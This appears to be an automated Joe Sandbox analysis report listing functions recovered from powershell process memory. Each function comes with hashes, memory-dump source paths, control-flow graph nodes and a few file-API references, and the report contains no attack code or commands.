                              • Instruction ID: 9a5a21d657ffcc76f5c3c67f011d6e28d8344b300781f1748fbef07cd2b7b2eb
                              • Opcode Fuzzy Hash: 9da826fcb73db9b2f0886f92194b085cad0f2cdeae026ac3c84f39be76329a94
                              • Instruction Fuzzy Hash: CCC00231A05138ABCB712B65FC048563FB5EB882A03558077A1045203186612C12EFD8
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Executed Functions

                              Function 00007FF9A5641C59 Relevance: .2, Instructions: 171COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.424006989.00007FF9A5640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5640000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_7ff9a5640000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 622978b3fcf4140a1fad4fc06b017763e5595810b7a758f3b7614c4cc03a2aa0
                              • Instruction ID: b137010881683bf4a604b86fded37691a18ac358a87a74cab0d15772dce3aa94
                              • Opcode Fuzzy Hash: 622978b3fcf4140a1fad4fc06b017763e5595810b7a758f3b7614c4cc03a2aa0
                              • Instruction Fuzzy Hash: 6C510831A4DA494FD304DB18D855BAAB7F1FF86310F0446BBE48DC7292CE78AD458781
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF9A5641775 Relevance: .0, Instructions: 49COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.424006989.00007FF9A5640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5640000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_7ff9a5640000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 755fe3cbdcad416eefa6f1acdf45f264f29895f7ace63e8cb25328fa015116ad
                              • Instruction ID: cb2986a5bb368abe1e14f5281d6ab5c9602a4fa24c80413e3d16075b3ffb8456
                              • Opcode Fuzzy Hash: 755fe3cbdcad416eefa6f1acdf45f264f29895f7ace63e8cb25328fa015116ad
                              • Instruction Fuzzy Hash: 7801677115CB0C4FDB44EF0CE451AA6B7E0FB99364F10056EE58AC3651DA36E881CB45
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Execution Graph

                              Execution Coverage:7%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:0%
                              Total number of Nodes:49
                              Total number of Limit Nodes:3
                              execution_graph 40555 e42188 40556 e4219a 40555->40556 40560 e44268 40556->40560 40565 e44278 40556->40565 40557 e421c9 40562 e44282 40560->40562 40561 e442a7 40561->40557 40562->40561 40570 e44330 40562->40570 40575 e44321 40562->40575 40566 e44282 40565->40566 40567 e442a7 40566->40567 40568 e44330 GetFileAttributesW 40566->40568 40569 e44321 GetFileAttributesW 40566->40569 40567->40557 40568->40567 40569->40567 40571 e44343 40570->40571 40580 e443a8 40571->40580 40586 e44398 40571->40586 40572 e44361 40572->40561 40576 e44343 40575->40576 40578 e443a8 GetFileAttributesW 40576->40578 40579 e44398 GetFileAttributesW 40576->40579 40577 e44361 40577->40561 40578->40577 40579->40577 40582 e443bd 40580->40582 40581 e444c3 40581->40572 40582->40581 40592 e44938 40582->40592 40583 e44482 40583->40581 40584 e44938 GetFileAttributesW 40583->40584 40584->40581 40588 e443bd 40586->40588 40587 e444c3 40587->40572 40588->40587 40591 e44938 GetFileAttributesW 40588->40591 40589 e44482 40589->40587 40590 e44938 GetFileAttributesW 40589->40590 40590->40587 40591->40589 40598 e44938 GetFileAttributesW 40592->40598 40599 e44998 40592->40599 40593 e44962 40594 e44968 40593->40594 40604 e43f8c 40593->40604 40594->40583 40598->40593 40600 e449b0 40599->40600 40601 e449c5 40600->40601 40602 e43f8c GetFileAttributesW 40600->40602 40601->40593 40603 e449f6 40602->40603 40603->40593 40605 e44f70 GetFileAttributesW 40604->40605 40607 e449f6 40605->40607 40607->40583 40545 68efcc0 40551 68ef7a4 40545->40551 40547 68efcf5 40549 68efdbc CreateFileW 40550 68efdf9 40549->40550 40552 68efd68 CreateFileW 40551->40552 40554 68efcdf 40552->40554 40554->40547 40554->40549

                              Executed Functions

                              Function 067DB790 Relevance: .4, Instructions: 380COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 485 67db790-67db7a4 487 67db7bf-67db7cc 485->487 488 67db7a6-67db7b2 485->488 493 67db7ce-67db7d9 487->493 494 67db820-67db89b 487->494 491 67db7dc-67db819 488->491 492 67db7b4-67db7bc 488->492 491->494 507 67dba4c-67dba63 494->507 508 67db8a1-67db8a5 494->508 510 67dba6a-67dbad5 507->510 509 67db8ab-67db8f1 508->509 508->510 515 67dba1c-67dba2f 509->515 516 67db8f7-67db906 509->516 526 67dbaea-67dbb39 510->526 527 67dbad7-67dbae8 510->527 518 67dba36 515->518 520 67db909-67db91d call 67dbdf6 516->520 518->507 522 67db923-67db927 520->522 524 67db92d-67db996 522->524 525 67dba07-67dba16 522->525 547 67db998-67db99d 524->547 548 67db9a5-67db9ac 524->548 525->515 525->520 527->526 532 67dbb3c-67dbb9d 527->532 554 67dbc65-67dbc7e 532->554 555 67dbba3-67dbbb0 532->555 547->548 549 67dba31 548->549 550 67db9b2-67dba04 call 67daf78 548->550 549->518 550->525 560 67dbc89 554->560 561 67dbc80 554->561 563 67dbbbe 555->563 564 67dbbb2-67dbbbc 555->564 561->560 565 67dbbc3-67dbbc5 563->565 564->565 567 67dbc4c 565->567 568 67dbbcb-67dbc4a 565->568 570 67dbc54-67dbc5f 567->570 568->570 570->554 570->555
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f12e45c25da915756fbe5e062fca3d0e457429be7f6825886378d58a30d24f65
                              • Instruction ID: 484e6cabafcb4f62bf4b9ce8cd04cc8af16c48d87b3ed2840acf3f7d83a8df07
                              • Opcode Fuzzy Hash: f12e45c25da915756fbe5e062fca3d0e457429be7f6825886378d58a30d24f65
                              • Instruction Fuzzy Hash: C5D1AD70B002089FDB04DB64D854BAEBBF7EF88700F198469E506AB3A1DF349D46CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 068EFCC0 Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 311 68efcc0-68efcf3 call 68ef7a4 315 68efd1e-68efdb4 311->315 316 68efcf5-68efd1d 311->316 325 68efdbc-68efdf7 CreateFileW 315->325 326 68efdb6-68efdb9 315->326 327 68efdf9-68efdff 325->327 328 68efe00-68efe1d 325->328 326->325 327->328
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440840573.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_68e0000_powershell.jbxd
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: 128deb45de4a2a89ed3be2a288f184daa6bc8f31a6c291c311a9d5d13c3d2b2a
                              • Instruction ID: 4407097fa55071ff29052f35435b0e9580cd1d99264ea5b893332c2e63e4612a
                              • Opcode Fuzzy Hash: 128deb45de4a2a89ed3be2a288f184daa6bc8f31a6c291c311a9d5d13c3d2b2a
                              • Instruction Fuzzy Hash: 5041B071A042599FDB04CFA9C844B9EFFF5FB48314F148169E608AB380C775A944CBE1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 068EF7A4 Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 331 68ef7a4-68efdb4 334 68efdbc-68efdf7 CreateFileW 331->334 335 68efdb6-68efdb9 331->335 336 68efdf9-68efdff 334->336 337 68efe00-68efe1d 334->337 335->334 336->337
                              APIs
                              • CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,068EFCDF,00000000,00000000,00000003,00000000,00000002), ref: 068EFDEA
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440840573.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_68e0000_powershell.jbxd
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: e01b7110497a3587c768ce986073b58e2c48179ef8b6d134feba5bf940e63dfa
                              • Instruction ID: 75c5586c90b749e8609287e13949880254f322500aab40f75fd4547e68cbb6b0
                              • Opcode Fuzzy Hash: e01b7110497a3587c768ce986073b58e2c48179ef8b6d134feba5bf940e63dfa
                              • Instruction Fuzzy Hash: 40212876D002199FCB10CF99D844ADEFBB4FB09310F108119EA15A7710C775AA14CFE5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00E44F68 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 340 e44f68-e44fba 342 e44fc2-e44fed GetFileAttributesW 340->342 343 e44fbc-e44fbf 340->343 344 e44ff6-e45013 342->344 345 e44fef-e44ff5 342->345 343->342 345->344
                              APIs
                              • GetFileAttributesW.KERNELBASE(00000000), ref: 00E44FE0
                              Memory Dump Source
                              • Source File: 0000001F.00000002.430772758.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_e40000_powershell.jbxd
                              Similarity
                              • API ID: AttributesFile
                              • String ID:
                              • API String ID: 3188754299-0
                              • Opcode ID: a770915c42af9aab4f68f2a40aa9f354a4520f7fa7beaf3a51f7fe93d853e8c1
                              • Instruction ID: 0578164904000129c178b05952602e3991c0168bfb6257f4f228645c6947a00d
                              • Opcode Fuzzy Hash: a770915c42af9aab4f68f2a40aa9f354a4520f7fa7beaf3a51f7fe93d853e8c1
                              • Instruction Fuzzy Hash: 672115B1E006199BCB10CF9AD444BDEFBB4FB48714F11851AD419B7740C774A905CFA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00E43F8C Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 348 e43f8c-e44fba 351 e44fc2-e44fed GetFileAttributesW 348->351 352 e44fbc-e44fbf 348->352 353 e44ff6-e45013 351->353 354 e44fef-e44ff5 351->354 352->351 354->353
                              APIs
                              • GetFileAttributesW.KERNELBASE(00000000), ref: 00E44FE0
                              Memory Dump Source
                              • Source File: 0000001F.00000002.430772758.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_e40000_powershell.jbxd
                              Similarity
                              • API ID: AttributesFile
                              • String ID:
                              • API String ID: 3188754299-0
                              • Opcode ID: 7872bac6a533761a7be19d7603e6e0e13b546bab5ec9cdc9d52748bfb2b79f7e
                              • Instruction ID: c90db5fce7be252759e4feba889f8ed2f895b56aed906f01ce7fa7a54554dcdd
                              • Opcode Fuzzy Hash: 7872bac6a533761a7be19d7603e6e0e13b546bab5ec9cdc9d52748bfb2b79f7e
                              • Instruction Fuzzy Hash: 942113B1E046599BCB10CF9AD444B9EFBF4BB48724F10812AE918B7740D774AA08CBA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D80EE Relevance: .3, Instructions: 325COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 585 67d80ee-67d8109 673 67d810c call 67d89a1 585->673 674 67d810c call 67d89b0 585->674 587 67d8112-67d8116 588 67d811c-67d8122 587->588 589 67d83be-67d83c0 587->589 590 67d8148-67d814b 588->590 591 67d8124-67d8137 588->591 592 67d8437-67d845d 589->592 593 67d83c2-67d8431 589->593 594 67d814d-67d8166 590->594 595 67d81bb-67d81be 590->595 604 67d8139-67d813b 591->604 605 67d8145 591->605 610 67d845f-67d846a 592->610 611 67d8470-67d8496 592->611 593->592 594->589 608 67d816c-67d8185 594->608 596 67d8334-67d8336 595->596 597 67d81c4-67d81ec 595->597 602 67d8398-67d83bc 596->602 603 67d8338-67d8351 596->603 597->589 618 67d81f2-67d821a 597->618 602->589 603->589 617 67d8353-67d836c 603->617 604->605 605->590 608->589 620 67d818b-67d81a4 608->620 610->611 629 67d84a9-67d84cf 611->629 630 67d8498-67d84a3 611->630 617->589 624 67d836e-67d8389 617->624 618->589 634 67d8220-67d8224 618->634 620->602 631 67d81aa 620->631 671 67d838c call 67d89a1 624->671 672 67d838c call 67d89b0 624->672 644 67d84d1-67d84dc 629->644 645 67d84e2-67d8508 629->645 630->629 631->589 638 67d822a-67d8253 634->638 639 67d8305-67d832d 634->639 637 67d8392-67d8396 637->589 637->602 638->639 654 67d8259-67d825d 638->654 639->602 649 67d832f 639->649 644->645 652 67d851d-67d8521 645->652 653 67d850a-67d851b 645->653 649->589 655 67d8544-67d854d 652->655 656 67d8523-67d8541 652->656 653->655 654->639 657 67d8263-67d8300 654->657 656->655 657->589 671->637 672->637 673->587 674->587
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d8a2bc6e9713ad4b5f7f1b8df4d3e1efa8dbf3c8163569bac2d981f4d947c8b4
                              • Instruction ID: 4759bc2a149a24f2ac4a8e1a6d48abbac3adf2365f29e2bd2990b27278155c8d
                              • Opcode Fuzzy Hash: d8a2bc6e9713ad4b5f7f1b8df4d3e1efa8dbf3c8163569bac2d981f4d947c8b4
                              • Instruction Fuzzy Hash: F6D15C79A00108DFCB55DFA4C954A9D7BBAFF48710B214629E90AAB331CB30ED41CF91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D05A5 Relevance: .3, Instructions: 319COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 762 67d05a5-67d0820 766 67d0828-67d0830 762->766 769 67d0830 call 67d0850 766->769 770 67d0830 call 67d0840 766->770 768 67d0836-67d083a 769->768 770->768
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 35bc891f84026960da5af9ad45609df377bef972388228fba4900e3cba8bdd2d
                              • Instruction ID: f539d23f40cabc913568bce594e60633c04d592f2f618ddc5b7b854331103373
                              • Opcode Fuzzy Hash: 35bc891f84026960da5af9ad45609df377bef972388228fba4900e3cba8bdd2d
                              • Instruction Fuzzy Hash: 0EF028312083856FC311E774EC958D67FA6EFC730074945E7E108CB462EB605959C7A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D4780 Relevance: .3, Instructions: 280COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9859f95d1315d80a2ea525bfa5d085729e4d12600e0ee596a074751a30daa905
                              • Instruction ID: c3bf09c2323f74f00ede0b16b82710c486342675357313ac1cab2b232cb04805
                              • Opcode Fuzzy Hash: 9859f95d1315d80a2ea525bfa5d085729e4d12600e0ee596a074751a30daa905
                              • Instruction Fuzzy Hash: F2C11734A00249CFDB54CFA4C454BAEBBF2BF85300F258869E805AB7A9DB34DD45CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067DBDF6 Relevance: .3, Instructions: 273COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 963fad497a4c86da993c904ec15ed849fa2d3668e1579fd388ca60e33040225b
                              • Instruction ID: b0e9ec1cd6de54565823bfbc59757849b92c9263d142287919b5b2cd0df03aea
                              • Opcode Fuzzy Hash: 963fad497a4c86da993c904ec15ed849fa2d3668e1579fd388ca60e33040225b
                              • Instruction Fuzzy Hash: 8CB1BD75A10209CFDB90DFA4C844BADB7F6AF84700F148D69E9069B265DB30ED4ACF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D4348 Relevance: .3, Instructions: 257COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bd06cb221e9bf22ca2cd182d008da6df5e841cd8d05e8f09884d471bb1dc249a
                              • Instruction ID: 9ab947846f8ba6ad78d7ec3a602cfe59428b498d13216021ba75e8b16f442de5
                              • Opcode Fuzzy Hash: bd06cb221e9bf22ca2cd182d008da6df5e841cd8d05e8f09884d471bb1dc249a
                              • Instruction Fuzzy Hash: 39A14734A00204CFDB58DF64D858A6DBBF2EF88315F258869E9169B3A1DF35EC46CB40
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 068D3FF8 Relevance: .2, Instructions: 230COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440650410.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_68d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 255ec2379202c2f99eae20d626d86a483e6091820a4d0b27a81df5ef8a104230
                              • Instruction ID: a2c00ff2a4bb1f5dc2f6e6b294d20b0c66f26cef86cf2b75974723c8f92de995
                              • Opcode Fuzzy Hash: 255ec2379202c2f99eae20d626d86a483e6091820a4d0b27a81df5ef8a104230
                              • Instruction Fuzzy Hash: EE819D35B002048FDB54DB78D844BAEBBF2EF88354F14886AD516EB391DF399845CB61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D3168 Relevance: .2, Instructions: 222COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 142bbf9536255385589e0a6bde18b4d384f3bcf81299c4fd51320aa8198dc835
                              • Instruction ID: 2a0c99c216a06d359ad52c94e64bf7a77a256e9e90c4bb7beec213177abd7c87
                              • Opcode Fuzzy Hash: 142bbf9536255385589e0a6bde18b4d384f3bcf81299c4fd51320aa8198dc835
                              • Instruction Fuzzy Hash: FE91CE31A102099FCB44DF78C481AAEBBF2EF89314F14C969E4169B761CB35ED46CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D3178 Relevance: .2, Instructions: 221COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 38600e8341579086f64e851ff30c34656251d4f18ad2052c981c2a75474f96e6
                              • Instruction ID: e5803ed8a2936a92a18fd6afa09966680f31f9fcca166f3928762246d43e4628
                              • Opcode Fuzzy Hash: 38600e8341579086f64e851ff30c34656251d4f18ad2052c981c2a75474f96e6
                              • Instruction Fuzzy Hash: 7891CE31A102099FDB44DF78C481AAEBBF2EF85314F14C969E4169B361CB34ED46CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D7EA8 Relevance: .2, Instructions: 218COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 58a4bd65afde30d978fa6f90a4b767fd60e98299b9b51fc096ec55fedf11fdc6
                              • Instruction ID: b3e8ceef519dc6cc49d126495d04cef27512b07ea702c6574dee362c6a315517
                              • Opcode Fuzzy Hash: 58a4bd65afde30d978fa6f90a4b767fd60e98299b9b51fc096ec55fedf11fdc6
                              • Instruction Fuzzy Hash: 9E81A031A012099FDB18DF74C454AAEB7F6EF88304F29896DE4099B352DB71EC46CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D74B0 Relevance: .2, Instructions: 214COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 41bbfa6b8b6f407902633fe56749bf7d350c9cb9e34346aa762c0321eedc04dd
                              • Instruction ID: 184d3ea8601e8afe8ab85d8697104062ecca649890e1c1589861537b2c21a853
                              • Opcode Fuzzy Hash: 41bbfa6b8b6f407902633fe56749bf7d350c9cb9e34346aa762c0321eedc04dd
                              • Instruction Fuzzy Hash: 3D71D331B002099FCB049FB89814ABFBBF7EF84610F248429EA1597381DF359D16CBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D4F10 Relevance: .2, Instructions: 208COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 98e87b28295584beb4f0e0a9efc3a6587b9947df6c5f88e48634b33f81a46133
                              • Instruction ID: 007c273118e2a18b2c93749cb97325b3d5db66702cc0148f6f9abe1eabb68ded
                              • Opcode Fuzzy Hash: 98e87b28295584beb4f0e0a9efc3a6587b9947df6c5f88e48634b33f81a46133
                              • Instruction Fuzzy Hash: 0F81B274E002099FEB14DFA0C8417AEB7F2EF84304F148869D905AB795DB79AD49CF50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067DF598 Relevance: .2, Instructions: 201COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6913895049a00b4c64c08fa5a398d99f88b3fb7c7bf7d817eb933caff66e9c20
                              • Instruction ID: 9be05fdd3c92415d9abf0883bf8829e83c59223b60ed5f3a0ada008221818809
                              • Opcode Fuzzy Hash: 6913895049a00b4c64c08fa5a398d99f88b3fb7c7bf7d817eb933caff66e9c20
                              • Instruction Fuzzy Hash: 4E719430A103059FDB44CFA5C484AAEBBF2FF84314F148969E406AB765DB74A946CF50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067DD9E0 Relevance: .2, Instructions: 189COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bb3cf6bf0c350b5d080ec65b6177fcd177ba985702203206759dfffe0f43e16e
                              • Instruction ID: f60aa84491508a379af03c9824763fb1467aa96c812d82039338f18bef6de449
                              • Opcode Fuzzy Hash: bb3cf6bf0c350b5d080ec65b6177fcd177ba985702203206759dfffe0f43e16e
                              • Instruction Fuzzy Hash: 14715D74A10209CFCB54DF68C485AAEBBF2EF88324F15C969D409AB361DB74AD45CF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D0938 Relevance: .2, Instructions: 178COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4b5e56ed95001c7d2b144425a450b1f7c8e20ba8ffcabcd355d6c0cdb51b3a93
                              • Instruction ID: 467baab23f14caa529a02fac582280e867231e3a21f323179a378c875144e640
                              • Opcode Fuzzy Hash: 4b5e56ed95001c7d2b144425a450b1f7c8e20ba8ffcabcd355d6c0cdb51b3a93
                              • Instruction Fuzzy Hash: B4519130B20112CFDB849EA9D95967F7ABAABC8645F215D29E903D7390EF709C01C7E1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 068D3920 Relevance: .2, Instructions: 165COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440650410.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_68d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ee233e98e12249a8964b8a22ea44a6cbe131a6742f95bcd4fd82750809999ee0
                              • Instruction ID: 08715cb9cf2c22b3395fc172a7ad2f389ff02669fb1ab653306d54bb6d7612c3
                              • Opcode Fuzzy Hash: ee233e98e12249a8964b8a22ea44a6cbe131a6742f95bcd4fd82750809999ee0
                              • Instruction Fuzzy Hash: FD614C30A00619DFCB54DFA8D895AADBBF2FF89304F158569E405EB362DB35AC01CB61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067DC2F0 Relevance: .2, Instructions: 164COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 68ea174e0903cbd5e469108ec27d49c8e6596edab343aef276f32323272daaba
                              • Instruction ID: 6f700eb66a684e2d010e054153af511c9b765367367e7985edaa2f515859119b
                              • Opcode Fuzzy Hash: 68ea174e0903cbd5e469108ec27d49c8e6596edab343aef276f32323272daaba
                              • Instruction Fuzzy Hash: D051BF357001049FDB04AB68D444AAEFBE6EF89320B14C56AE90ADB751DF30ED09CBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D89B0 Relevance: .2, Instructions: 164COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3aaf1b9f19ebb38ae4ed72b88736b36a3c21961f3a3f876228e98dd5a9769b54
                              • Instruction ID: d772c8a085c64f9209386d129130c5c6bb1ccadcd5db23789125188b11d6c411
                              • Opcode Fuzzy Hash: 3aaf1b9f19ebb38ae4ed72b88736b36a3c21961f3a3f876228e98dd5a9769b54
                              • Instruction Fuzzy Hash: B451C331B002049FDB54DF68C890BAE77F2EF88710F158979E506AB3A1CB74AC458B92
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D3761 Relevance: .2, Instructions: 150COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1eb28f0e705b64ed264eb2423cb5d32f4268d61a68c6beeb69bcb510f97d9220
